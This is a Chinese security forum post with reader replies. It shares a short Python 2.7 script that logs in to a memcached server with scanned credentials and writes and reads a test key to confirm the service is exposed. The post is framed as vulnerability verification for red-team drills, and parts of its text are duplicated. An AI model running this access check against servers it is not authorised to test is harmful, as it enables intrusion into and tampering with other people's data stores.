学python得永生python大法好之利用python编写memcache数据库操作(有账号密码的那种)
以前大家对memcache漏洞验证只局限于未授权访问,那么遇到shack2超级口令扫描出来的带账号和密码的该怎么登陆,估计知道的人应该不多,试试过一款国内的11211管理工具,也只能填写密码登陆,没有填写账号的的地方,今天给大家放一个python脚本,用来hw的时候验证漏洞,py27写的,支持账号密码登陆的如果漏洞存在如下图:
如果漏洞不存在如下图:
代码写的烂不代表本人没有一颗分享的热忱之心,希望大家多多分享一些东西,众人拾柴火焰高
注意pip install python-binary-memcached
#!/usr/bin/env python
import bmemcached
client = bmemcached.Client(('8.8.8.8:11211'),'root','123456qwerty')
#client = bmemcached.Client(('8.8.8.8:11211')) 如果没账号密码就用这条代码
print client.set('key', 'caonima')
print client.get('key')
如果漏洞不存在如下图:
代码写的烂不代表本人没有一颗分享的热忱之心,希望大家多多分享一些东西,众人拾柴火焰高
注意pip install python-binary-memcached
评论12次
关于memecache,除了信息泄露,还能有啥利用?
感谢分享~
哈哈哈哈,caonima我也常用,谢谢拉
memcache爆破出密码的情况不多
以后就可以直接不用下载工具来验证了
目前我好像发现没什么工具可以验证码输入账号密码的工具,哈哈
以后就可以直接不用下载工具来验证了
感谢分享,感觉会遇到
刚好遇到 memcache,感谢分享。
果然多逛逛是好的,又了解了memcache~感谢分享
楼主代码暴露了caonima哈哈
分享精神就是好的 支持楼主一波
感谢
分享精神就是好的 支持楼主一波